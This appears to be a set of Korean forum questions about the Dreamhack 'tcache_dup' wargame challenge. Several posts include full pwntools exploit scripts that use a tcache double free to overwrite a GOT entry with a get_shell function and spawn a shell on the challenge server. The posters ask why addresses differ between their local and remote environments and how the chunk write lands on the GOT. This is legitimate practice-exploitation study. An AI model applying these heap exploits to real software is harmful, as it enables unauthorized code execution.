원래는 아래와 같이 payload를 짜서 풀었는데 EOF가 나면서 에러가 떴습니다. from pwn import * p = remote("host3.dreamhack.games", 11786) e = ELF("./tcache_dup") def create(size,data): p.sendlineafter(">", str(1)) p.sendlineafter("Size: ", str(size)) p.sendafter("Data: ", data) def delete(idx): p.sendlineafter(">", str(2)) p.sendlineafter("idx:", str(idx)) get_shell = e.symbols['get_shell'] print_got = e.got['printf'] create(48, b"a"*0x8) delete(0) delete(0) create(48,p64(print_got)) create(48,b'a'*8) create(48, p64(get_shell)) p.interactive() 그래서 인터넷에 찾아보다보니 저의 get_shell의 주소와 print_got주소가 다르다는 것을 알았습니다. 제 환경에서 get_shell과 print_got의 주소를 출력하면 각각 0x400aa9, 0x602038가 나오는데 문제가 풀리는 주소는 0x400ab0, 0x601038였습니다. 질문은 1) 이렇게 주소 차이가 발생하는 이유가 무엇인지요...? 입니다. 답변 부탁드립니다 ㅠㅠ 감사합니다!

문제 서버 연결해서 하면 익스가 되는데 로컬에서 libc 적용하고 익스 시도하면 안되는데 로컬에서 익스플로잇 하는 방법이 있나요?

from pwn import * r = remote("host3.dreamhack.games",24344) #r = process("./tcache_dup") e = ELF("./tcache_dup") libc = ELF("./libc-2.27.so") #gdb.attach(r) def create(size,data): r.sendlineafter("> ",b'1') r.sendlineafter("Size: ",str(size).encode()) r.sendafter("Data: ",data) def delete(idx): r.sendlineafter("> ",b'2') r.sendlineafter("idx: ",str(idx).encode()) getshell = e.symbols['get_shell'] success("getshell: "+hex(getshell)) free_got = e.got['free'] success("free_got: "+hex(free_got)) #tcache_dup #tcache[0x40]: A create(0x30,b'A') delete(0) #tcache[0x40]: A -> A delete(0) tcache[0x40]: A -> free_got create(0x30, p64(free_got)) tcache[0x40]: free_got create(0x30, b'B') #tcache[0x40]: create(0x30, p64(getshell)) delete(0) r.interactive() 위와 같이 풀긴 했는데 막상 풀고나니 궁금한 게 생겨 질문드립니다. create(0x30, p64(free_got)를 통해서 tcache가 free_got의 주소값을 가리키게 하는 것 까지는 이해가 갔는데 어떻게 free_got를 주소로 하는 청크에 p64(getshell)을 썼는데 free_got의 값이 바뀌나요? 청크 구조에 따라서 free_got+0x10의 값이 getshell로 바뀌어야 하는 것 아닌가요? 제가 어떤 것을 잘못 이해하고 있는지 모르겠습니다.

로컬 환경과 원격 모두 glibc 2.27 버전인데 로컬에선 막히고 원격에선 되네요.. glibc 버전이 같아도 환경에 따라 dfb가 막히기도 하나요? 원격 환경이 dfb 검증을 하는지 확인하는 간편한 방법이 따로 있을까요? 직접 시도해보고 EOFError 뜨는지 확인하는 방법이 최선일까요?

from pwn import * p = remote('host3.dreamhack.games', 19102) #p = process('./tcache_dup') e = ELF('./tcache_dup') libc = ELF('libc-2.27.so') def create(a, b): p.sendlineafter('> ', str(1)) p.sendlineafter(': ', str(a)) p.sendafter(': ', b) def delete(a): p.sendlineafter('> ', str(2)) p.sendlineafter(': ', str(a)) create(0x10, 'aaaa') delete(0) delete(0) create(0x10, p64(e.got['puts'])) create(0x10, 'a'*8) create(0x10, p64(e.sym['get_shell'])) p.interactive() 이렇게 해서 풀었는데 더블프리 하고 다시 create(0x10, p64(e.got['puts'])) create(0x10, 'a'*8) create(0x10, p64(e.sym['get_shell'])) 저렇게 할당 받았을때 왜 puts@got가 쉘 함수로 덮이는지 궁금 합니다 중간에 왜 a*8이 들어가는지도 궁금하고 도와주세요..